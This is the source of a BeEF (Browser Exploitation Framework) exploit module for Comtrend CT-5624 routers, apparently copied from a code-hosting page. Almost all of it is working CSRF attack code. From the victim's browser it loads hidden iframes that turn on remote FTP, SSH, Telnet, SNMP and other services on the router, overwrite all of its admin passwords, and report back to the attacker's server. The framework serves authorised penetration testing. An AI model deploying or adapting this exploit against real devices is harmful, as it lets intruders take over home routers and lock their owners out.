Path: blob/master/modules/exploits/router/comtrend_ct5624_csrf/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {7var gateway = '<%= @base %>';8var passwd = '<%= @password %>';9var timeout = 15;1011var ct5367_iframe1_<%= @command_id %> = beef.dom.createInvisibleIframe();12ct5367_iframe1_<%= @command_id %>.setAttribute('src', gateway+'scsrvcntr.cmd?action=save&ftp=1&ftp=3&http=1&http=3&icmp=1&snmp=1&snmp=3&ssh=1&ssh=3&telnet=1&telnet=3&tftp=1&tftp=3');1314var ct5367_iframe2_<%= @command_id %> = beef.dom.createInvisibleIframe();15ct5367_iframe2_<%= @command_id %>.setAttribute('src', gateway+'/password.cgi?usrPassword='+passwd+'&sysPassword='+passwd+'&sptPassword='+passwd);1617beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");1819cleanup = function() {20document.body.removeChild(ct5367_iframe1_<%= @command_id %>);21document.body.removeChild(ct5367_iframe2_<%= @command_id %>);22}23setTimeout("cleanup()", timeout*1000);2425});26272829